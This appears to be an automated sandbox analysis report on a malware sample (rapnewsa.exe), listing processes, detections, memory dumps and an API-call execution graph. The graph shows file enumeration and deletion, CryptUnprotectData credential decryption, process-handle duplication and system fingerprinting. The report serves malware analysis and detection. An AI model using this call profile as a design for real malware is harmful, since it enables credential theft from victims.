                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:06:55:34
                          Start date:27/08/2024
                          Path:C:\Reka\rapnewsa.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Reka\rapnewsa.exe
                          Imagebase:0xa40000
                          File size:38'912 bytes
                          MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 16%, ReversingLabs
                          • Detection: 24%, Virustotal, Browse
                          Has exited:true

                          Target ID:22
                          Start time:06:55:39
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480
                          Imagebase:0xa40000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Reset < >
                            Memory Dump Source
                            • Source File: 00000000.00000002.2047361224.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                            • Associated: 00000000.00000002.2047342877.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047569380.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047765712.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047782588.00000000007C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047798588.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047813917.00000000007C5000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047847248.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047866115.00000000007F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047880917.00000000007F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047894469.00000000007FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.00000000007FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.0000000000817000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.0000000000885000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.000000000088C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048169395.0000000000AC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048184205.0000000000AC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048184205.0000000000ACF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2e0000_1feP5qTCl0.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                            • Instruction ID: 31541b908a5347a2938a2391308deb1582e00074ecdf302eecd22eb7fb594464
                            • Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                            • Instruction Fuzzy Hash: F8319A2791CFC482D3218B24F5413AAB364F7A9784F15A715EFC812A1ADF38E2E5CB40
                            Memory Dump Source
                            • Source File: 00000000.00000002.2047361224.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                            • Associated: 00000000.00000002.2047342877.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047569380.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047765712.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047782588.00000000007C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047798588.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047813917.00000000007C5000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047847248.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047866115.00000000007F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047880917.00000000007F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047894469.00000000007FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.00000000007FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.0000000000817000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047911693.0000000000885000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.000000000088C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2047987389.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048169395.0000000000AC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048184205.0000000000AC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2048184205.0000000000ACF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2e0000_1feP5qTCl0.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                            • Instruction ID: 44abc729c1de11bb888a13ac41822fe8e2c4787134efc886ccc4b41f9fd48558
                            • Opcode Fuzzy Hash: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                            • Instruction Fuzzy Hash:

                            Execution Graph

                            Execution Coverage:19.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:14.5%
                            Total number of Nodes:379
                            Total number of Limit Nodes:11
                            execution_graph 2957 a41897 2958 a41845 2957->2958 2960 a4188c 2958->2960 2961 a418a2 GlobalHandle 2958->2961 2959 a418e8 2960->2959 2962 a419f7 LoadLibraryA GetProcAddress 2960->2962 2961->2958 2962->2959 2494 a41d30 CreateMutexA 2495 a41d52 GetLastError 2494->2495 2496 a41d5f 2494->2496 2495->2496 2497 a41d64 2495->2497 2507 a41ca0 2497->2507 2499 a41d86 2518 a430c0 2499->2518 2501 a41e27 2536 a41c80 2501->2536 2503 a41e17 Sleep 2505 a41da0 2503->2505 2504 a41e33 CloseHandle ExitProcess 2505->2501 2505->2503 2529 a43c50 2505->2529 2543 a416e0 2507->2543 2510 a41cce ExitProcess 2514 a41cba 2514->2510 2564 a42810 2514->2564 2517 a41cd6 2517->2499 2855 a41470 2518->2855 2520 a430ce 2876 a41ea0 RtlAllocateHeap 2520->2876 2522 a431a1 2522->2505 2523 a430db 2523->2522 2524 a48b90 GetCurrentHwProfileA 2523->2524 2525 a43112 2524->2525 2877 a431b0 2525->2877 2527 a43147 2528 a42b10 3 API calls 2527->2528 2528->2522 2909 a41ea0 RtlAllocateHeap 2529->2909 2531 a43d1a 2531->2505 2532 a43c63 2532->2531 2533 a48b90 GetCurrentHwProfileA 2532->2533 2534 a43c9a 2533->2534 2535 a42b10 3 API calls 2534->2535 2535->2531 2910 a429e0 2536->2910 2538 a41c8c 2916 a43ee0 2538->2916 2542 a41c99 2542->2504 2569 a41c40 2543->2569 2547 a416f0 2549 a416f4 2547->2549 2575 a417e0 2547->2575 2549->2510 2552 a41e50 HeapCreate 2549->2552 2550 a417e0 3 API calls 2551 a4170b 2550->2551 2551->2549 2551->2550 2553 a41cb1 2552->2553 2553->2510 2554 a43d50 2553->2554 2583 a43ef0 VirtualAlloc 2554->2583 2557 a43d68 2587 a443e0 2557->2587 2558 a43d74 2594 a41ea0 RtlAllocateHeap 2558->2594 2560 a43d6d 2560->2514 2562 a43d82 2595 a41ee0 2562->2595 2565 a42848 2564->2565 2566 a428c5 CreateThread 2565->2566 2568 a41cc7 2565->2568 2567 a428eb CreateThread 2566->2567 2566->2568 2604 a42db0 2566->2604 2567->2568 2598 a42e60 2567->2598 2568->2510 2568->2517 2570 a41c47 CryptSignHashA CryptUpdateProtectedState WinHttpTimeFromSystemTime 2569->2570 2571 a416eb 2569->2571 2570->2571 2572 a41a40 2571->2572 2582 a41a20 GetPEB 2572->2582 2574 a41a55 2574->2547 2577 a41845 2575->2577 2576 a418e8 2576->2551 2578 a418a2 GlobalHandle 2577->2578 2580 a4188c 2577->2580 2578->2577 2579 a419f7 LoadLibraryA GetProcAddress 2579->2576 2580->2576 2580->2579 2581 a419f1 2580->2581 2581->2579 2582->2574 2584 a43f16 VirtualAlloc 2583->2584 2585 a43d5b 2583->2585 2584->2585 2586 a43f39 VirtualAlloc 2584->2586 2585->2557 2585->2558 2586->2585 2588 a443ec VirtualFree 2587->2588 2589 a443ff 2587->2589 2588->2589 2590 a4441c 2589->2590 2591 a44408 VirtualFree 2589->2591 2592 a44425 VirtualFree 2590->2592 2593 a44439 2590->2593 2591->2590 2592->2593 2593->2560 2594->2562 2596 a41f07 2595->2596 2597 a41ef1 RtlFreeHeap 2595->2597 2596->2560 2597->2596 2602 a42e6d 2598->2602 2599 a430af 2600 a4309f Sleep 2600->2602 2602->2599 2602->2600 2610 a41ea0 RtlAllocateHeap 2602->2610 2611 a42920 2602->2611 2605 a42db4 2604->2605 2606 a42e4c 2605->2606 2607 a42e3c Sleep 2605->2607 2609 a42920 RtlFreeHeap 2605->2609 2619 a42590 2605->2619 2607->2605 2609->2605 2610->2602 2612 a42935 2611->2612 2613 a429ca 2611->2613 2614 a41ee0 RtlFreeHeap 2612->2614 2613->2602 2615 a42949 2614->2615 2616 a41ee0 RtlFreeHeap 2615->2616 2617 a42960 2616->2617 2618 a41ee0 RtlFreeHeap 2617->2618 2618->2613 2620 a4259c 2619->2620 2621 a42629 2620->2621 2622 a426ba 2620->2622 2637 a425a2 2620->2637 2641 a41ea0 RtlAllocateHeap 2621->2641 2623 a426cc 2622->2623 2624 a4275d 2622->2624 2651 a41ea0 RtlAllocateHeap 2623->2651 2624->2637 2659 a41ea0 RtlAllocateHeap 2624->2659 2628 a42648 2642 a41060 2628->2642 2629 a426eb 2652 a412f0 2629->2652 2630 a4278e 2660 a41000 CryptUnprotectData 2630->2660 2636 a41ee0 RtlFreeHeap 2636->2637 2637->2605 2639 a41ee0 RtlFreeHeap 2639->2637 2640 a41ee0 RtlFreeHeap 2640->2637 2641->2628 2643 a410a4 2642->2643 2644 a41085 SHGetFolderPathW 2642->2644 2664 a48d40 2643->2664 2644->2643 2647 a410f3 2647->2636 2649 a410da 2680 a42b10 2649->2680 2651->2629 2653 a41327 2652->2653 2654 a41307 SHGetFolderPathW 2652->2654 2655 a48d40 11 API calls 2653->2655 2654->2653 2656 a4134c 2655->2656 2657 a41366 2656->2657 2814 a43a20 2656->2814 2657->2639 2659->2630 2661 a4104e 2660->2661 2662 a4103d 2660->2662 2661->2640 2843 a432a0 2662->2843 2690 a41ea0 RtlAllocateHeap 2664->2690 2666 a48d53 2667 a410c8 2666->2667 2691 a42360 2666->2691 2667->2647 2679 a41ec0 RtlSizeHeap 2667->2679 2670 a48ec9 2671 a41ee0 RtlFreeHeap 2670->2671 2671->2667 2672 a48ea6 FindNextFileW 2674 a48ebf FindClose 2672->2674 2675 a48d95 2672->2675 2673 a42360 2 API calls 2673->2675 2674->2670 2675->2670 2675->2672 2675->2673 2676 a48d40 8 API calls 2675->2676 2696 a41110 2675->2696 2709 a41380 2675->2709 2676->2675 2679->2649 2807 a42a60 2680->2807 2684 a42b2d 2685 a42bb0 2684->2685 2686 a42b4f 2684->2686 2687 a42920 RtlFreeHeap 2685->2687 2689 a41ee0 RtlFreeHeap 2686->2689 2688 a42b99 2687->2688 2688->2647 2689->2688 2690->2666 2694 a42372 2691->2694 2692 a42570 FindFirstFileW 2692->2675 2694->2692 2695 a41ee0 RtlFreeHeap 2694->2695 2718 a41ea0 RtlAllocateHeap 2694->2718 2695->2694 2697 a412e2 2696->2697 2698 a4112d 2696->2698 2697->2675 2699 a41189 2698->2699 2702 a411b0 2698->2702 2723 a436d0 2699->2723 2701 a41ee0 RtlFreeHeap 2701->2697 2703 a411a8 2702->2703 2707 a4120e 2702->2707 2719 a490b0 2702->2719 2703->2701 2705 a436d0 7 API calls 2706 a412a2 2705->2706 2706->2703 2708 a412c8 DeleteFileW 2706->2708 2707->2703 2707->2705 2708->2703 2710 a4139d 2709->2710 2717 a413e0 2709->2717 2711 a413d5 2710->2711 2712 a4140a 2710->2712 2806 a41ea0 RtlAllocateHeap 2711->2806 2805 a41ec0 RtlSizeHeap 2712->2805 2715 a41415 2716 a42060 2 API calls 2715->2716 2715->2717 2716->2717 2717->2675 2718->2694 2720 a490c8 2719->2720 2721 a490e0 2720->2721 2738 a42200 2720->2738 2721->2707 2724 a436ee 2723->2724 2743 a48b90 GetCurrentHwProfileA 2724->2743 2726 a43702 2745 a438c0 2726->2745 2729 a437b4 2763 a434a0 2729->2763 2730 a437fa 2732 a437ef 2730->2732 2778 a41ea0 RtlAllocateHeap 2730->2778 2734 a41ee0 RtlFreeHeap 2732->2734 2735 a4379b 2734->2735 2735->2703 2736 a43820 2736->2732 2737 a42b10 3 API calls 2736->2737 2737->2732 2739 a4220f 2738->2739 2742 a41ea0 RtlAllocateHeap 2739->2742 2741 a42223 2741->2721 2742->2741 2744 a48baa 2743->2744 2744->2726 2746 a438f8 2745->2746 2760 a43791 2745->2760 2746->2760 2779 a48f20 2746->2779 2748 a43934 2749 a43940 2748->2749 2750 a43953 2748->2750 2752 a41ee0 RtlFreeHeap 2749->2752 2788 a41ea0 RtlAllocateHeap 2750->2788 2752->2760 2753 a43965 2789 a47d10 2753->2789 2755 a439a0 2756 a439de 2755->2756 2759 a439ae 2755->2759 2757 a41ee0 RtlFreeHeap 2756->2757 2757->2760 2758 a43972 2758->2755 2793 a480d0 2758->2793 2762 a41ee0 RtlFreeHeap 2759->2762 2760->2729 2760->2730 2760->2735 2762->2760 2764 a43548 2763->2764 2765 a434ba 2763->2765 2797 a41ec0 RtlSizeHeap 2764->2797 2796 a41ea0 RtlAllocateHeap 2765->2796 2768 a435a1 2771 a435bf 2768->2771 2774 a42b10 3 API calls 2768->2774 2769 a43573 2769->2768 2770 a43614 2769->2770 2798 a41ec0 RtlSizeHeap 2770->2798 2772 a434a0 5 API calls 2771->2772 2777 a434cc 2772->2777 2774->2771 2775 a43622 2775->2777 2799 a42060 2775->2799 2777->2732 2778->2736 2780 a42360 RtlAllocateHeap RtlFreeHeap 2779->2780 2782 a48f4c 2780->2782 2781 a490a2 2781->2748 2782->2781 2783 a49098 CloseHandle 2782->2783 2784 a41ea0 RtlAllocateHeap 2782->2784 2783->2781 2785 a4902d 2784->2785 2785->2783 2786 a41ee0 RtlFreeHeap 2785->2786 2787 a49082 2785->2787 2786->2787 2787->2783 2788->2753 2790 a47d23 2789->2790 2792 a47d29 2789->2792 2791 a489f0 RtlAllocateHeap 2790->2791 2790->2792 2791->2792 2792->2758 2794 a48a50 RtlFreeHeap 2793->2794 2795 a480dc 2794->2795 2795->2755 2796->2777 2797->2769 2798->2775 2800 a4206d 2799->2800 2801 a42069 2799->2801 2802 a42081 RtlReAllocateHeap 2800->2802 2803 a42073 2800->2803 2801->2777 2802->2801 2804 a41ea0 RtlAllocateHeap 2803->2804 2804->2801 2805->2715 2806->2717 2811 a42a6f 2807->2811 2808 a42b01 2812 a41ea0 RtlAllocateHeap 2808->2812 2809 a42af4 Sleep 2809->2811 2811->2808 2811->2809 2813 a41ea0 RtlAllocateHeap 2811->2813 2812->2684 2813->2811 2815 a43a3c 2814->2815 2816 a48b90 GetCurrentHwProfileA 2815->2816 2817 a43a50 2816->2817 2826 a43b80 2817->2826 2821 a43b60 2822 a41ee0 RtlFreeHeap 2821->2822 2823 a43b6c 2822->2823 2823->2657 2824 a43ada 2824->2821 2825 a42b10 3 API calls 2824->2825 2825->2821 2841 a41ec0 RtlSizeHeap 2826->2841 2828 a43b8f 2842 a41ea0 RtlAllocateHeap 2828->2842 2830 a43ba7 2831 a47d10 RtlAllocateHeap 2830->2831 2836 a43bb4 2831->2836 2832 a43be2 2833 a43c1c 2832->2833 2834 a43bf0 2832->2834 2835 a41ee0 RtlFreeHeap 2833->2835 2838 a41ee0 RtlFreeHeap 2834->2838 2839 a43ac8 2835->2839 2836->2832 2837 a480d0 RtlFreeHeap 2836->2837 2837->2832 2838->2839 2840 a41ea0 RtlAllocateHeap 2839->2840 2840->2824 2841->2828 2842->2830 2854 a41ea0 RtlAllocateHeap 2843->2854 2845 a433a7 2846 a433c2 2845->2846 2847 a433b3 LocalFree 2845->2847 2849 a433dd 2846->2849 2850 a433cd LocalAlloc 2846->2850 2847->2849 2848 a432b3 2848->2845 2851 a48b90 GetCurrentHwProfileA 2848->2851 2849->2661 2850->2849 2852 a432ea 2851->2852 2853 a42b10 3 API calls 2852->2853 2853->2845 2854->2848 2895 a41ea0 RtlAllocateHeap 2855->2895 2857 a4148e 2858 a4149b NtQuerySystemInformation 2857->2858 2859 a42060 2 API calls 2857->2859 2858->2857 2864 a414d3 2858->2864 2859->2857 2860 a415fa 2863 a41ee0 RtlFreeHeap 2860->2863 2861 a415f5 2861->2520 2862 a41512 OpenProcess 2862->2864 2865 a41603 2863->2865 2864->2860 2864->2861 2864->2862 2866 a4153a GetCurrentProcess DuplicateHandle 2864->2866 2865->2520 2867 a4156f 2866->2867 2868 a415eb FindCloseChangeNotification 2866->2868 2867->2868 2869 a4157b GetFileType 2867->2869 2868->2861 2869->2868 2870 a4158a 2869->2870 2896 a41610 2870->2896 2872 a41593 2872->2868 2873 a4159a CloseHandle GetCurrentProcess DuplicateHandle 2872->2873 2873->2868 2874 a415d2 2873->2874 2874->2868 2875 a415d8 CloseHandle 2874->2875 2875->2868 2876->2523 2878 a431c5 2877->2878 2900 a48d00 GetUserDefaultUILanguage 2878->2900 2880 a43233 2901 a48c00 EnumDisplayDevicesA 2880->2901 2882 a4324b 2883 a48b90 GetCurrentHwProfileA 2882->2883 2884 a43259 2883->2884 2903 a48cc0 GetPhysicallyInstalledSystemMemory 2884->2903 2886 a43265 2905 a48ca0 GetSystemInfo 2886->2905 2888 a43271 2906 a48c50 GetKeyboardLayoutList 2888->2906 2890 a4327d 2907 a48c70 KiUserCallbackDispatcher GetSystemMetrics 2890->2907 2892 a43289 2908 a48d20 GetModuleFileNameW 2892->2908 2894 a43295 2894->2527 2895->2857 2897 a4161d 2896->2897 2898 a41656 NtQueryObject NtQueryObject 2897->2898 2899 a41693 2898->2899 2899->2872 2900->2880 2902 a48c2a 2901->2902 2902->2882 2904 a48cd4 __aulldiv 2903->2904 2904->2886 2905->2888 2906->2890 2907->2892 2908->2894 2909->2532 2911 a429ec 2910->2911 2912 a42a25 2911->2912 2913 a42a17 TerminateThread 2911->2913 2914 a42a3d 2912->2914 2915 a42a2e TerminateThread 2912->2915 2913->2912 2914->2538 2915->2914 2917 a443e0 3 API calls 2916->2917 2918 a41c94 2917->2918 2919 a41e80 HeapDestroy 2918->2919 2919->2542 2932 a425e3 2933 a425eb 2932->2933 2934 a42629 2933->2934 2935 a426ba 2933->2935 2940 a4260d 2933->2940 2954 a41ea0 RtlAllocateHeap 2934->2954 2936 a426cc 2935->2936 2937 a4275d 2935->2937 2955 a41ea0 RtlAllocateHeap 2936->2955 2937->2940 2956 a41ea0 RtlAllocateHeap 2937->2956 2942 a42648 2945 a41060 12 API calls 2942->2945 2943 a426eb 2946 a412f0 12 API calls 2943->2946 2944 a4278e 2948 a41000 7 API calls 2944->2948 2947 a42686 2945->2947 2949 a42729 2946->2949 2950 a41ee0 RtlFreeHeap 2947->2950 2951 a427cc 2948->2951 2952 a41ee0 RtlFreeHeap 2949->2952 2950->2940 2953 a41ee0 RtlFreeHeap 2951->2953 2952->2940 2953->2940 2954->2942 2955->2943 2956->2944 2920 a42c09 2921 a42cd5 2920->2921 2928 a42c16 2920->2928 2922 a42c9c 2921->2922 2923 a42d29 2921->2923 2925 a42d08 2921->2925 2924 a42060 2 API calls 2923->2924 2924->2922 2926 a41ee0 RtlFreeHeap 2925->2926 2926->2922 2927 a42c88 2927->2922 2929 a42c94 ExitProcess 2927->2929 2928->2922 2928->2927 2930 a42c9e 2928->2930 2930->2922 2931 a42cbc ExitProcess 2930->2931 2963 a4177a 2965 a4174c 2963->2965 2964 a417e0 3 API calls 2964->2965 2965->2964 2966 a417b5 2965->2966

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 00A414A9
                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00A41523
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A4154B
                            • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00A41565
                            • GetFileType.KERNELBASE(000000FF), ref: 00A4157F
                            • CloseHandle.KERNEL32(000000FF), ref: 00A4159E
                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00A415AE
                            • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 00A415C8
                            • CloseHandle.KERNEL32(000000FF), ref: 00A415DC
                            • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00A415EF
                              • Part of subcall function 00A41EE0: RtlFreeHeap.NTDLL(02D10000,00000000,00000000,02B30000), ref: 00A41EFE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                            • String ID:
                            • API String ID: 2769610337-0
                            • Opcode ID: fd6aa161e0d80b5519a59bb3628f33ac5b17f014e103464d959a4a8d28221bbd
                            • Instruction ID: 1b0cab2d510d9c76de5f39f97e33f48bb92bb0f1fc2b05076e2f54d890fae307
                            • Opcode Fuzzy Hash: fd6aa161e0d80b5519a59bb3628f33ac5b17f014e103464d959a4a8d28221bbd
                            • Instruction Fuzzy Hash: C65131B9D00209EFDB14CFD8D985FAEB7B5BBC8305F204258E612A7280D775DA81CB65

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 75 a48d40-a48d5d call a41ea0 78 a48ed5-a48ed8 75->78 79 a48d63-a48da6 call a42360 FindFirstFileW call a42250 75->79 84 a48dac-a48dd1 call a42250 * 2 79->84 85 a48ec9-a48ed2 call a41ee0 79->85 92 a48dd3-a48de6 84->92 93 a48de8-a48dec 84->93 85->78 92->93 94 a48e18 92->94 95 a48e1d-a48e47 call a42360 93->95 96 a48dee-a48e01 93->96 98 a48ea6-a48eb9 FindNextFileW 94->98 109 a48e48 call a41380 95->109 110 a48e48 call a41110 95->110 96->95 97 a48e03-a48e16 96->97 97->94 97->95 98->84 100 a48ebf-a48ec3 FindClose 98->100 100->85 102 a48e4b-a48e54 103 a48e56-a48e5c 102->103 104 a48e9a-a48ea2 102->104 103->104 105 a48e5e-a48e68 103->105 104->98 105->104 106 a48e6a-a48e89 call a48d40 105->106 108 a48e8e-a48e97 106->108 108->104 109->102 110->102
                            APIs
                              • Part of subcall function 00A41EA0: RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            • FindFirstFileW.KERNELBASE(00000000,?), ref: 00A48D83
                            • FindNextFileW.KERNELBASE(000000FF,?), ref: 00A48EB1
                            • FindClose.KERNEL32(000000FF), ref: 00A48EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Find$File$AllocateCloseFirstHeapNext
                            • String ID: %s\%s$%s\*
                            • API String ID: 2963102669-2848263008
                            • Opcode ID: 32b42eaf44f60c808820763517806159251bae62e44583c66691798474867edf
                            • Instruction ID: b3df9d9fbe8acad6508b45b086434343f1f43feb3077886ef467e680e11e79f0
                            • Opcode Fuzzy Hash: 32b42eaf44f60c808820763517806159251bae62e44583c66691798474867edf
                            • Instruction Fuzzy Hash: F641C1B9D00218EBCB14DFA4DD56AEF77B5AFC8300F1085A8F91597281EA39DB41DB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 111 a417e0-a41843 112 a41845-a4184b 111->112 113 a4184e-a41857 111->113 112->113 114 a418e2-a418e6 113->114 115 a4185d-a4188a call a42130 call a490f0 113->115 117 a418ef-a41916 114->117 118 a418e8-a418ea 114->118 127 a4188c-a41895 115->127 128 a41899-a418a0 115->128 120 a41a16 117->120 121 a4191c-a41925 117->121 122 a41a19-a41a1c 118->122 120->122 121->120 124 a4192b-a41931 121->124 126 a41938-a41944 124->126 129 a41946-a4195e 126->129 130 a41960-a419c9 126->130 127->114 131 a418a2-a418c8 GlobalHandle 128->131 132 a418cb-a418dd 128->132 129->126 133 a419f7-a41a12 LoadLibraryA GetProcAddress 130->133 134 a419cb-a419dc 130->134 131->132 132->112 133->122 135 a419f1-a419f4 134->135 136 a419de-a419ef 134->136 135->133 136->134
                            APIs
                            • GlobalHandle.KERNEL32(00000000), ref: 00A418C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: GlobalHandle
                            • String ID: l
                            • API String ID: 1075865800-2517025534
                            • Opcode ID: e85a4c9461a0fb04610a2dc7d5e8d99657e82eb4971424b3b2bc0538daffab49
                            • Instruction ID: 499cbae571a064fa8163161ba1c2fe0521f8cd441d8e10b5b438a8c4dc5ff3d7
                            • Opcode Fuzzy Hash: e85a4c9461a0fb04610a2dc7d5e8d99657e82eb4971424b3b2bc0538daffab49
                            • Instruction Fuzzy Hash: 3A919678E05209DFCF04CF98D590AADBBB2FF89308F248199D915A7345D730AA91DF94
                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00A43271,00A43147), ref: 00A48CAA
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
